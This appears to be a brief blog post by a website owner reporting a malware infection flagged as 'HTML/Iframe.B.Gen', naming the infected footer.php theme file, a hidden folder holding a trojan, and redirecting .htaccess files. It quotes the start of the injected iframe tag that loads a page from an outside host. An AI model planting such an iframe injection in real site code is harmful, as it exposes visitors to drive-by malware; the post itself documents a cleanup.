I was faced with another virus. NOD32 called him “HTML/Iframe.B.Gen”.
The virus body
The virus body was located in the theme file “footer.php”.
<iframe src="http://janapiercegal.com/in.cgi?2" ...
In the root of the site, I found a folder “.hcc.thumbs” with file “lndex.php” which contained trojan.
In addition to the virus I have found “.htaccess” files with redirects.